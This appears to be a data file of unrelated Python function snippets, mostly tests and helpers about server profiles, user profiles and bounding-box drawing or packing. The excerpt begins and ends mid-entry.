drives\")\n for item in FusionServerProfilesPage.LIST_NAME_DRIVE_TECHNOLOGY:\n if __select_value_from_a_profile_combo_box(FusionServerProfilesPage.ID_NAME_DRIVE_TECHNOLOGY, FusionServerProfilesPage.ID_COMBO_DEFAULT_ITEM_DRIVE % item):\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_COMBO_DRIVE_TECHNOLOGY, \" --> '\" + item + \"' option 'Drive technology' dropdown\")\n else:\n logger._log_to_console_and_log_file(\" --> Failed to select item %s in logical drive type combobox\" % item)\n testResult &= False\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_BTN_CREATE_LOGICAL_DRIVE_FORM, \" --> Looking for 'Create' button\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_BTN_CREATE_PLUS_LOGICAL_DRIVE, \" --> Looking for 'Create +' button\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_BTN_ADD_LOGICAL_DRIVE_CANCEL, \" --> Clicking on 'Cancel' button of screen add logical drive\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_COMBO_BOOT_DRIVE_LOCAL_STORAGE, \" --> Select combo boot drive\")\n\n \"\"\" SAN Storage \"\"\"\n logger._log_to_console_and_log_file(\"########### Accessing to SAN storage..###########\")\n testResult &= ui_lib.wait_for_element_and_click(profile_elements.ID_COMBO_MENU_VIEW)\n testResult &= ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_LINK_SANSTORAGE, \" --> San Storage Link on Profile Dropdown Menu\")\n testResult &= correctly_executed(ui_lib.wait_for_checkbox_and_select, FusionServerProfilesPage.ID_CHKBOX_SAN_STORAGE, \" --> Check manage san storage\")\n\n for item in FusionServerProfilesPage.LIST_NAME_HOST_OS_TYPE:\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_OS_TYPE_DROP_DOWN, \" --> Combobox Host OS type\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_OS_TYPE_SELECT % item, \" --> '\" + item + \"' option 'Host OS type' dropdown\")\n\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_BTN_ADD_STORAGE, \" --> Clicking on 'Add Volume' button\")\n logger._log_to_console_and_log_file(\" --> Select Existing volume \")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_VOLUME_TYPE, \" --> Combobox type\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.GET_TEXT_FROM_SPAN % VolumeTypes.EXISTING_VOLUME, \" --> '\" + VolumeTypes.EXISTING_VOLUME + \"' option 'Type' dropdown\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_VOLUME_NAME_SEARCH, \" --> Search name of volume \")\n\n logger._log_to_console_and_log_file(\" --> Select New volume \")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_VOLUME_TYPE, \" --> Combobox type\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.GET_TEXT_FROM_SPAN % VolumeTypes.NEW_VOLUME, \" --> '\" + VolumeTypes.NEW_VOLUME + \"' option 'Type' dropdown\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_NEW_VOLUME_NAME, \" --> New volume name\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, 
FusionServerProfilesPage.ID_NEW_VOLUME_DESCRIPTION, \" --> Description\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_LUN_MANUAL, \" --> Check Manual on radiobox\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_LUN_VALUE, \" --> Specify a number between 0 and 16383\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_STORAGE_POOL_DROPDOWN, \" --> Search a storage pool \")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_CAPACITY_BOX, \" --> The capacity GiB\")\n\n for item in FusionServerProfilesPage.LIST_NAME_PROVISIONING:\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_PROVISIONING_DROPDOWN, \" --> Combobox provisioning\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_SELECT_PROVISIONING % item, \" --> '\" + item + \"' option 'Provisioning' dropdown\")\n testResult &= correctly_executed(ui_lib.wait_for_checkbox_and_unselect, FusionServerProfilesPage.ID_CHK_PERMANENT, \" --> Uncheck permanent\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_BTN_STORAGE_ADD, \" --> Looking for 'Add' button\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_BTN_STORAGE_ADD_PLUS, \" --> Looking for 'Add+' button\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_CANCEL_BTN, \" --> Click on 'Cancel' button\")\n\n \"\"\" Setting boot order \"\"\"\n logger._log_to_console_and_log_file(\"########### Accessing to Boot Settings..###########\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, profile_elements.ID_COMBO_MENU_VIEW, \" --> Create Profile Dropdown Menu \")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_LINK_BOOTSETTINGS, \" --> Boot Settings Link on Profile Dropdown Menu\")\n\n if __fill_boot_settings_fields(profile, profile_elements):\n logger._log_to_console_and_log_file(\" --> Fill boot settings executed correctly\")\n else:\n testResult = False\n logger._log_to_console_and_log_file(\" --> Fill boot settings NOT executed correctly\")\n\n \"\"\" Select Advanced Options \"\"\"\n logger._log_to_console_and_log_file(\"########### Accessing to Advanced options..###########\")\n logger._log_to_console_and_log_file(\" --> Radio each in Advanced Options\")\n logger._log_to_console_and_log_file(\" --> Clicking each radio in Advanced Options\")\n\n if __select_advanced_options(profile, profile_elements):\n logger._log_to_console_and_log_file(\" --> Select advanced options elements were correctly displayed\")\n else:\n testResult = False\n logger._log_to_console_and_log_file(\" --> Select advanced options elements were NOT correctly displayed\")\n\n \"\"\" Click on button Cancel Server Profile\"\"\"\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_BTN_CREATE_SERVER_PROFILE, \" --> Looking for 'Create' button\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_BTN_CREATE_PLUS_SERVER_PROFILE, \" --> Looking for 'Create +' button\")\n logger._log_to_console_and_log_file(\"########### Click on button Cancel Server Profile..###########\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, 
FusionServerProfilesPage.ID_BTN_CANCEL_SERVER_PROFILE, \" --> Clicking on 'Cancel' button of server profile\")\n if testResult is True:\n logger._log_to_console_and_log_file(\"- All the elements were found\")\n else:\n logger._log_to_console_and_log_file(\"When test fails, console logging is not filled\")\n ui_lib.fail_test(\"- At least one element was not found. Please check the 'Overview' page\")", "def gain_box_score(im, preds):\n if len(preds[0]) == 0:\n cv2.imshow(\"Video detection\", im)\n else:\n for pred in preds:\n for i, box_label in enumerate(zip( pred[\"boxes\"], pred[\"labels\"] )):\n box, label = box_label\n xmin, ymin, xmax, ymax = box\n#-------------------- Create a Rectangle patch ----------------------- \n if label==1:\n class_name='with_mask'\n color = (0, 255, 0)\n elif label==2:\n class_name='without_mask'\n color = (0, 0, 255)\n elif label==3:\n class_name='mask_worn_improperly'\n color = (255, 255 ,0)\n score = pred['scores'][i]\n#--------------------- Bounding Box painting -------------------------- \n if score > 0.65:\n cv2.rectangle(im, (xmin, ymin), (xmax, ymax), color, 1) \n cv2.putText(im, str(class_name)+str(round(score.item(),2)), (xmin,int(ymax-ymax/20)),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 1) #print class name\n cv2.imshow(\"Video detection\",im)\n print('*****', 'Bbox:', i , '*****' )\n print('Class: ', str(class_name))\n print('Scores: ', str(round(score.item(),2)))\n print('boxes: ',f'{int(xmin)}, {int(ymin)}, {int(xmax)}, {int(ymax)}')\n print('image shape: ', im.shape) \n else:\n cv2.imshow(\"Video detection\", im)\n print('********************','\\n')", "def test_next(self, display_detections=False):\n batch = next(self.data_iterator)\n sample_index, image_size, image_resize_ratio, images, rois = batch\n sample_index = sample_index.cpu().numpy()[0]\n image_resize_ratio = image_resize_ratio.cpu().numpy()[0]\n rois = rois[0]\n image_size = image_size.cpu().numpy()[0]\n\n all_boxes = self.test_single(images, rois, image_size,\n image_resize_ratio)\n\n if display_detections:\n display_boxes, display_classes = self.get_display_boxes(all_boxes)\n sample = self.data_loader.dataset.samples[sample_index]\n if len(display_boxes) > 0:\n self.display_detections(\n display_boxes,\n display_classes,\n sample)\n\n return all_boxes", "def testMethodProfile2D(self):\n\n toolBar = self.plot.getProfileToolbar()\n\n toolBar.vLineAction.trigger()\n plot2D = self.plot.getPlotWidget().getWidgetHandle()\n pos1 = plot2D.width() * 0.5, plot2D.height() * 0.5\n self.mouseClick(plot2D, qt.Qt.LeftButton, pos=pos1)\n\n manager = toolBar.getProfileManager()\n roi = manager.getCurrentRoi()\n roi.setProfileMethod(\"mean\")\n roi.setProfileType(\"2D\")\n roi.setProfileLineWidth(3)\n\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break\n\n # check 2D 'mean' profile\n profilePlot = roi.getProfileWindow().getCurrentPlotWidget()\n data = profilePlot.getAllImages()[0].getData()\n expected = numpy.array([[1, 4], [7, 10], [13, 16]])\n numpy.testing.assert_almost_equal(data, expected)", "def test_resultingGoose_inside(self):\n goose = coordinate.Coordinate(4, 2)\n actual_result = rules.resultingGoose(types.GOOSE, goose)\n expected_result = types.SUPERGOOSE\n self.assertEqual(actual_result, expected_result)", "def verifyViewProfile(self):\n self.waitForElement(locator=self._viewProfileImg, locatorType=\"xpath\")\n result = self.isElementPresent(locator=self._viewProfileImg, locatorType=\"xpath\")\n self.log.info(\"Verify View Profile result: \" + 
str(result))\n return result", "def test_positive_electrode_potential_profile(self):\n\n # TODO: add these when have averages", "def inner_test(param: models.Game):\n self.assertEqual(param, game)", "def test_creation_profile_5():\n assert tuple_NT[0][4] == LIST_dict[0]['current_location'], \"current_location' of profile is not getting stored properly\"", "def test_profiles(\n self, profile_name: str, pytestconfig: object, monkeypatch: object, options: object\n ) -> None: # pylint: disable=unused-argument\n\n # initialize profile\n valid, message = self.init_profile(\n profile_name, pytestconfig=pytestconfig, monkeypatch=monkeypatch, options=options\n )\n assert valid, message\n\n # run custom test method before run method\n self.custom.test_pre_run(\n self, self.profile.data, monkeypatch if self.run_method == 'inline' else None\n )\n\n assert self.run_profile() in self.profile.exit_codes\n\n # run custom test method before validation\n self.custom.test_pre_validate(self, self.profile.data)\n\n # get Validation instance\n validation = ValidateFeature(self.validator)\n\n # validate App outputs and Profile outputs are consistent\n validation.validate_outputs(self.profile.tc_playbook_out_variables, self.profile.outputs)\n\n # validate App outputs with Profile outputs\n validation.validate(self.profile.outputs)\n\n # validate exit message\n exit_message_data = self.profile.exit_message\n if exit_message_data:\n self.validate_exit_message(\n exit_message_data.pop('expected_output'),\n exit_message_data.pop('op'),\n **exit_message_data\n )", "def test_add_spawning_profile():\n center = Coordinates(1 , 1)\n radius = 10\n speed_limit = 20\n\n i = Intersection(center, radius, speed_limit)\n\n assert not i.get_spawning_profile_list()\n\n default_driver = DriverProfile(\"Default\", 8, 2, 2, 0, 30, 3, 1)\n default_vehicle = VehicleProfile(\"Default\", 5, 15, 2, 2, 1000, 65)\n default_spawn = SpawningProfile(\"Default\", default_driver, default_vehicle)\n spawn2 = SpawningProfile(\"spawn2\", default_driver, default_vehicle)\n\n i.add_spawning_profile(default_spawn)\n\n assert i.get_spawning_profile_list()\n assert len(i.get_spawning_profile_list()) == 1\n\n i.add_spawning_profile(spawn2)\n\n assert len(i.get_spawning_profile_list()) == 2", "def test_xml_ibox(self):\n # Return to new line\n print\n\n # Create the box\n self.mypbox = Pbox(self.myiterativedesc)\n\n # Test raises\n self.assertRaises(ValueError, self.mypbox)\n\n # Test execution\n self.mypbox.inputs.inp = \"str\"\n self.mypbox()\n self.assertEqual(self.mypbox.outputs.outp.value, \"str0str1\")\n\n if 0:\n from PySide import QtGui\n import sys\n from casper.view import PipelineView\n app = QtGui.QApplication.instance()\n if app is None:\n app = QtGui.QApplication(sys.argv)\n pview = PipelineView(self.mypbox)\n pview.show()\n app.exec_()", "def test_profile_image_requested_field(self):\n user_2 = UserFactory.create(password=self.password)\n # Ensure that parental controls don't apply to this user\n user_2.profile.year_of_birth = 1970\n user_2.profile.save()\n source_threads = [\n self.create_source_thread(),\n self.create_source_thread({\"user_id\": str(user_2.id), \"username\": user_2.username}),\n ]\n\n self.register_get_user_response(self.user, upvoted_ids=[\"test_thread\"])\n self.register_get_threads_response(source_threads, page=1, num_pages=1)\n self.create_profile_image(self.user, get_profile_image_storage())\n self.create_profile_image(user_2, get_profile_image_storage())\n\n response = self.client.get(\n self.url,\n {\"course_id\": 
str(self.course.id), \"requested_fields\": \"profile_image\"},\n )\n assert response.status_code == 200\n response_threads = json.loads(response.content.decode('utf-8'))['results']\n\n for response_thread in response_threads:\n expected_profile_data = self.get_expected_user_profile(response_thread['author'])\n response_users = response_thread['users']\n assert expected_profile_data == response_users[response_thread['author']]", "def test_creation_profile_2():\n assert tuple_NT[0][1] == LIST_dict[0]['sex'], \"sex of profile is not getting stored properly\"", "def test_Box2D(box_coordinates, score, test_point):\n box2D = Box2D(box_coordinates, score)\n assert (box2D.contains(test_point))", "def test_if_paper_beats_rock():\n\tresult = game.evaluate_game('paper', 'rock')\n\tassert result == 'User'", "async def test_basic_profile(players, strats):\n game = gamegen.game(players, strats)\n basesched = gamesched.gamesched(game)\n sched = canonsched.canon(basesched)\n assert np.all(sched.num_role_strats > 1)\n pay = await sched.sample_payoffs(sched.random_profile())\n assert pay.size == sched.num_strats\n assert str(sched) == str(basesched)", "def helper():\n for mode in PackingMode:\n for bin_algo in PackingBin:\n for size, w, h in ('big_enough', 50, 50), ('too_small', 5, 5):\n name = '_'.join(('test', mode, bin_algo, size))\n print(\"\"\"\\\n def %s(self):\n # create bins that are %s to hold the rectangles\n p = self._common(PackingMode.%s, PackingBin.%s, %s, %s)\"\"\" %\n (name, size.replace('_', ' '), mode, bin_algo, w, h))\n if size == 'big_enough':\n print(\"\"\"\\\n # check that bins were created\n self.assertGreater(len(p.bin_list()), 0)\n # check that all of the rectangles made it in\n self.assertEqual(len(p.rect_list()), len(self.rectangles))\n\"\"\")\n else:\n print(\"\"\"\\\n # check that none of the rectangles made it in\n self.assertEqual(len(p.rect_list()), 0)\n\"\"\")", "def test_get_all_boxes(self, postfix_directory):\n print(\"Test_All_Boxes\")\n protein_file = os.path.join(postfix_directory, \"PfATP4.pdb\")\n ligand_file = os.path.join(postfix_directory, \"SJ733.pdb\")\n coords = rdkit_util.load_molecule(protein_file)[0]\n\n boxes = dc.dock.binding_pocket.get_all_boxes(coords)\n assert isinstance(boxes, list)\n # Pocket is of form ((x_min, x_max), (y_min, y_max), (z_min, z_max))\n for pocket in boxes:\n assert len(pocket) == 3\n assert len(pocket[0]) == 2\n assert len(pocket[1]) == 2\n assert len(pocket[2]) == 2\n (x_min, x_max), (y_min, y_max), (z_min, z_max) = pocket\n assert x_min < x_max\n assert y_min < y_max\n assert z_min < z_max", "def test_instance_profile_exists(self) -> None:\n self.assertTrue(self.validate_instance_profile('s3-access-role', is_prod=self.prod_env))", "def check_profile(args):\n with_dataset(args, Dataset._check_profile)", "def inner_test(param: models.Game):\n pass", "def test_basic(self):\n plugin_instance = ProbabilitiesFromPercentiles2D(self.test_cube,\n self.new_name)\n self.assertEqual(plugin_instance.output_name, self.new_name)", "def test_creation_profile_4():\n assert tuple_NT[0][3] == LIST_dict[0]['blood_group'], \"blood_group of profile is not getting stored properly\"", "def test_create_with_profile(self):\n # make sure the guest not exists\n self.sdkapi.guest_create(self.userid, 1, 1024,\n user_profile=CONF.zvm.user_profile)\n self.assertTrue(\n self.test_util.wait_until_create_userid_complete(self.userid))", "def test(self):\n img_gen, self.loss_reg, self.parsav = self.net_G(self.input_P1, self.input_P2, self.input_BP1, self.input_BP2, 
self.input_SPL1, self.input_SPL2)\n ## test flow ##\n\n self.save_results(img_gen, data_name='vis')\n if self.opt.save_input or self.opt.phase == 'val':\n self.save_results(self.input_P1, data_name='ref')\n self.save_results(self.input_P2, data_name='gt')\n result = torch.cat([self.input_P1, img_gen, self.input_P2], 3)\n self.save_results(result, data_name='all')", "def negative_test_for_check_general_session(profile_obj):\n status = True\n\n logger._log_to_console_and_log_file(\"### Testing the 'General' session ###\")\n\n # LIST_OF_TESTS specify a list of elements to be validated in the \"General\" page\n # For each element of the list, we add the following information:\n # [0] = The locator of the field that we'll input the data (e.g. FusionPage.DescriptionEditBox)\n # [1] = The input data (e.g. MyProfile, !@#%&&*, blablabla, etc...)\n # [2] = The locator of the error message (e.g. FusionPage.ErrorMessage)\n # [3] = The Message name that will be displayed at the console and logs\n for profile in profile_obj:\n LIST_OF_TESTS = [[None, \"\", FusionServerProfilesPage.ID_WARNING_FIELD_REQUIRED, \"ID_WARNING_FIELD_REQUIRED\"],\n [FusionServerProfilesPage.ID_SERVER_HARDWARE_TEXT_BOX, \"none\", FusionServerProfilesPage.ID_WARNING_INVALID_SERVERHARDWARE, \"ID_WARNING_INVALID_SERVERHARDWARE\"],\n [FusionServerProfilesPage.ID_INPUT_SERVER_HARDWARE_TYPE, \"none\", FusionServerProfilesPage.ID_WARNING_INVALID_SERVER_HARDWARE_TYPE, \"ID_WARNING_INVALID_SERVER_HARDWARE_TYPE\"],\n [FusionServerProfilesPage.ID_ENCLOSURE_GROUP_TEXT_BOX, \"none\", FusionServerProfilesPage.ID_WARNING_INVALID_ENCLOSURE_GROUP, \"ID_WARNING_INVALID_ENCLOSURE_GROUP\"],\n [FusionServerProfilesPage.ID_SERVER_HARDWARE_TEXT_BOX, profile.invalidChars, FusionServerProfilesPage.ID_WARNING_INVALID_SERVERHARDWARE, \"ID_WARNING_INVALID_SERVERHARDWARE\"],\n [FusionServerProfilesPage.ID_INPUT_SERVER_HARDWARE_TYPE, profile.invalidChars, FusionServerProfilesPage.ID_WARNING_INVALID_SERVER_HARDWARE_TYPE, \"ID_WARNING_INVALID_SERVER_HARDWARE_TYPE\"],\n [FusionServerProfilesPage.ID_ENCLOSURE_GROUP_TEXT_BOX, profile.invalidChars, FusionServerProfilesPage.ID_WARNING_INVALID_ENCLOSURE_GROUP, \"ID_WARNING_INVALID_ENCLOSURE_GROUP\"]]\n logger._log_to_console_and_log_file(\"Testing using MISSING information and with special chars\")\n for test in LIST_OF_TESTS:\n # Fill \"Server hardware\" if needed.\n if test[0] == FusionServerProfilesPage.ID_INPUT_SERVER_HARDWARE_TYPE:\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_COMBO_SERVER_HARDWARE_DROPDOWN)\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_SERVER_HARDWARE_UNASSIGNED)\n ui_lib.wait_for_element_and_input_text(FusionServerProfilesPage.ID_INPUT_SERVER_PROFILE_NAME, \"Name\")\n if test[0] is not None:\n ui_lib.wait_for_element_and_input_text(test[0], test[1])\n ui_lib.wait_for_element_and_click(test[0])\n ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_BTN_CREATE_SERVER_PROFILE)\n if not correctly_executed(ui_lib.wait_for_element_visible, test[2], test[3]):\n status = False\n if not status:\n ui_lib.fail_test(\"At least one error message was not displayed\")", "def draw_person_boxes(self, frame, boxes, probs):\n # convert color space for numpy\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n # for all the boxes:\n for (box, prob) in zip(boxes, probs):\n \n # extract the properties of the box and text:\n (startX, startY, endX, endY) = box.astype(\"int\")\n label = \"{}: {:.2f}%\".format(\"Person\", prob * 100)\n font = cv2.FONT_HERSHEY_SIMPLEX\n 
font_scale = 0.7\n thickness = 1\n text_size, _ = cv2.getTextSize(label, font, font_scale, thickness)\n text_w, text_h = text_size\n \n text_color_bg = (0,0,0) # black bg for text\n text_color = (255,255,255) # white text\n box_color = (255,0,0) # red box\n \n # draw the bb prediction on the frame\n cv2.rectangle(frame, (startX, startY), (endX, endY), box_color , 1)\n \n # include text:\n y = startY - text_h if startY - text_h > text_h else startY + text_h\n cv2.rectangle(frame, (startX, y - text_h), (startX + text_w, startY-1), text_color_bg, -1)\n cv2.putText(frame, label, (startX, y), font, font_scale, text_color, thickness)\n\n frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)\n return frame", "def test_boxscore_player_stats(self):\n test_v_player_stat = self.BS.vTeam_player_stats[0]['firstName']\n test_answer_v = 'Isaac'\n test_h_player_stat = self.BS.hTeam_player_stats[0]['firstName']\n test_answer_h = 'Pascal'\n self.assertEqual(test_v_player_stat, test_answer_v)\n self.assertEqual(test_h_player_stat, test_answer_h)", "def test_components_profile(self):\r\n\t\tprofile = Profile.objects.get(bio=\"I'm a female profile with inserted components\")\r\n\t\tself.assertEqual(self.u1.profile, profile)", "def test_generate_paulis(generators, num_qubits, result):\n pauli_ops = qml.paulix_ops(generators, num_qubits)\n for p1, p2 in zip(pauli_ops, result):\n assert p1.compare(p2)", "def run_tests():\n db.connect()\n db.create_tables([Result])\n\n config = configparser.ConfigParser()\n config.read(\"config.ini\")\n number_of_generations = int(config[\"genetics\"][\"number_of_generations\"])\n\n test_file_paths = []\n\n for file in os.listdir(\"resources/tests/umpalettierung\"):\n if file.endswith(\".csv\"):\n test_file_paths.append(os.path.join(\"resources/tests/umpalettierung\", file))\n\n for path in test_file_paths:\n start = timeit.default_timer()\n boxes_to_pack, box_types = read_input(path)\n size_of_population = int(config[\"genetics\"][\"population_multiplier\"]) * len(boxes_to_pack)\n test_name_list = []\n for box_type in box_types:\n test_name_list.append(f\"{box_type.identifier[:5]}_{box_type.quantity()}\")\n test_name_list.sort()\n test_name = '.'.join(test_name_list)\n print(\n f\"Running {test_name} with {number_of_generations} generations with a population size of {size_of_population}\")\n print(box_types)\n pop, stats, hof = run_genetics(boxes_to_pack, box_types, number_of_generations, size_of_population)\n get_packing_order(hof[0], boxes_to_pack, box_types, test_name=test_name)\n stop = timeit.default_timer()\n save_results(test_name, start, stop, len(pop), number_of_generations, pop, stats)", "def test_get_game_boxscore(self):\n msg = \"Response status is not 200\"\n response = self.api.get_game_boxscore(self.game_id)\n self.assertEqual(response.status_code, 200, msg)", "def testIdentity(self):\r\n for profile in self.profiles:\r\n self.assertEqual(profile.edit_distance(profile), 0)", "def test_private_rooms_have_profiles_requested(self) -> None:\n\n async def get_remote_profile(\n user_id: str, ignore_backoff: bool = True\n ) -> JsonDict:\n if user_id == \"@bruce:remote\":\n return {\n \"displayname\": \"Sir Bruce Bruceson\",\n \"avatar_url\": \"mxc://remote/789\",\n }\n else:\n raise ValueError(f\"unable to fetch {user_id}\")\n\n with patch.object(self.profile_handler, \"get_profile\", get_remote_profile):\n # Continue from the earlier test...\n self.test_private_rooms_do_not_have_profiles_collected()\n\n # Advance by a minute\n self.reactor.advance(61.0)\n\n profiles = 
self.get_success(\n self.user_dir_helper.get_profiles_in_user_directory()\n )\n self.assertEqual(\n profiles.get(\"@bruce:remote\"),\n ProfileInfo(\n display_name=\"Sir Bruce Bruceson\", avatar_url=\"mxc://remote/789\"\n ),\n )", "def test_name_of_cube(self):\n result = calculate_sleet_probability(self.snow_prob_cube, self.rain_prob_cube)\n name = \"probability_of_sleet\"\n self.assertEqual(result.long_name, name)", "def testAlignedProfile(self):\n # Use Plot backend widget to submit mouse events\n widget = self.plot.getWidgetHandle()\n for method in ('sum', 'mean'):\n with self.subTest(method=method):\n # 2 positions to use for mouse events\n pos1 = widget.width() * 0.4, widget.height() * 0.4\n pos2 = widget.width() * 0.6, widget.height() * 0.6\n\n for action in (self.toolBar.hLineAction, self.toolBar.vLineAction):\n with self.subTest(mode=action.text()):\n # Trigger tool button for mode\n action.trigger()\n # Without image\n self.mouseMove(widget, pos=pos1)\n self.mouseClick(widget, qt.Qt.LeftButton, pos=pos1)\n\n # with image\n self.plot.addImage(\n numpy.arange(100 * 100).reshape(100, -1))\n self.mousePress(widget, qt.Qt.LeftButton, pos=pos1)\n self.mouseMove(widget, pos=pos2)\n self.mouseRelease(widget, qt.Qt.LeftButton, pos=pos2)\n\n self.mouseMove(widget)\n self.mouseClick(widget, qt.Qt.LeftButton)\n\n manager = self.toolBar.getProfileManager()\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break", "def testIdentity(self):\n for profile in self.profiles:\n self.assertEqual(profile.edit_distance(profile), 0)", "def test_validate_payment_profile(self):\n self.cim.validate_payment_profile(\n customer_profile_id=u\"222\",\n customer_payment_profile_id=u\"444\",\n customer_address_id=u\"555\",\n )", "def generateBoxPoints(frame_resolution, min_dim_rect = 80, max_dim_rect = 160, limit_x = (-1, -1), limit_y = (-1, -1)):\n \n randint = np.random.randint\n \n #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n # Generate point 1 (pt1)\n \n if(limit_x != (-1, -1)): x1 = randint(limit_x[0], limit_x[1])\n else: x1 = randint(0, frame_resolution[0])\n \n if(limit_y != (-1, -1)): y1 = randint(limit_y[0], limit_y[1])\n else: y1 = randint(0, frame_resolution[1])\n \n pt1 = (x1, y1)\n \n #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n # Generate point 2 (pt2)\n \n bad_point = True\n \n # Since the random generation pt2 can have invalid coordinate. So the script continue to generat point until a valid point is generated\n while(bad_point):\n x2 = x1 + random.choice((-1, 1)) * randint(min_dim_rect, max_dim_rect)\n y2 = y1 + random.choice((-1, 1)) * randint(min_dim_rect, max_dim_rect)\n \n if not (x2 > frame_resolution[0] or x2 < 0 or y2 > frame_resolution[1] or y2 < 0): bad_point = False\n \n if(limit_x != (-1, -1) and (x2 < limit_x[0] or x2 > limit_x[1])): bad_point = True\n if(limit_y != (-1, -1) and (y2 < limit_y[0] or y2 > limit_y[1])): bad_point = True\n \n pt2 = (x2, y2)\n \n #- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n \n return pt1, pt2", "def test_rectangle_yank(self):\n before_b = \"\"\"\\\n before\n aaaxxxbbb\n aaaxxxbbb\n aaaxxxbbb\n aaaxxxbbb\n after\n \"\"\"\n after_b = \"\"\"\\\n before\n aaaY1Ybbb\n aaaY2Ybbb\n aaaY3Ybbb\n aaaY4Ybbb\n after\n \"\"\"\n # A hack. 
The command tests for g.app.unitTesting.\n g.app.unitTesting = True\n try:\n self.run_test(\n before_b=before_b,\n after_b=after_b,\n before_sel=(\"2.3\", \"5.6\"),\n after_sel=(\"2.3\", \"5.6\"),\n command_name=\"rectangle-yank\",\n )\n finally:\n g.app.unitTesting = False", "def generateFinalResult(self):\n if self.__testResult == 'FAIL':\n Util.set_color(Util.FOREGROUND_RED | Util.FOREGROUND_INTENSITY)\n elif self.__testResult == 'PASS':\n Util.set_color(Util.FOREGROUND_GREEN | Util.FOREGROUND_INTENSITY)\n elif self.__testResult == 'NONE':\n Util.set_color(Util.FOREGROUND_GREEN | Util.FOREGROUND_INTENSITY) \n self.__testResult = 'PASS'\n #else:\n total_count = int(TestScriptSymbolTable.get_value_from_sym_tab(\"total_count\", TestScriptSymbolTable.test_result_tab))\n pass_count = int(TestScriptSymbolTable.get_value_from_sym_tab(\"pass_count\", TestScriptSymbolTable.test_result_tab))\n fail_count = int(TestScriptSymbolTable.get_value_from_sym_tab(\"fail_count\", TestScriptSymbolTable.test_result_tab))\n conditional_chk_flag = int(TestScriptSymbolTable.get_value_from_sym_tab(\"conditional_chk_flag\", TestScriptSymbolTable.test_result_tab))\n num_of_pass_required = int(TestScriptSymbolTable.get_value_from_sym_tab(\"num_of_pass_required\", TestScriptSymbolTable.test_result_tab))\n \n if total_count >= 1:\n if conditional_chk_flag == 1:\n if num_of_pass_required <= pass_count:\n Util.set_color(Util.FOREGROUND_GREEN | Util.FOREGROUND_INTENSITY)\n self.__testResult = 'PASS'\n else:\n Util.set_color(Util.FOREGROUND_RED | Util.FOREGROUND_INTENSITY)\n self.__testResult = 'FAIL'\n else:\n if fail_count > 0:\n Util.set_color(Util.FOREGROUND_RED | Util.FOREGROUND_INTENSITY)\n self.__testResult = 'FAIL'\n else:\n Util.set_color(Util.FOREGROUND_GREEN | Util.FOREGROUND_INTENSITY)\n self.__testResult = 'PASS'\n else:\n if GlobalConfigFiles.curr_tc_name != \"\":\n Util.set_color(Util.FOREGROUND_RED | Util.FOREGROUND_INTENSITY)\n logging.debug(\"\\n TEST COMPLETED without FINAL RESULT...\")\n\n self.__testResult = 'FAIL'\n\n self.tmsPacket.TestResult = self.__testResult\n if GlobalConfigFiles.curr_tc_name != \"\":\n logging.info(\"\\n FINAL TEST RESULT ---> %15s\", self.__testResult)\n logging.info(' END: TEST CASE [%s]', GlobalConfigFiles.curr_tc_name)\n\n Util.set_color(Util.FOREGROUND_WHITE)\n GlobalConfigFiles.test_result = self.__testResult\n\n self.tmsPacket.TimeStamp = time.strftime('%Y-%m-%dT%H:%M:%SZ', time.localtime())\n if GlobalConfigFiles.curr_tc_name != \"\":\n self.tmsPacket.writeTMSJson()\n\n return", "def drawBoxOfROI(scores_roi, boxes_roi, padding_ratio,\n margin_ratio, im_width, im_height, image_np):\n try:\n (left, right, top, bottom) = 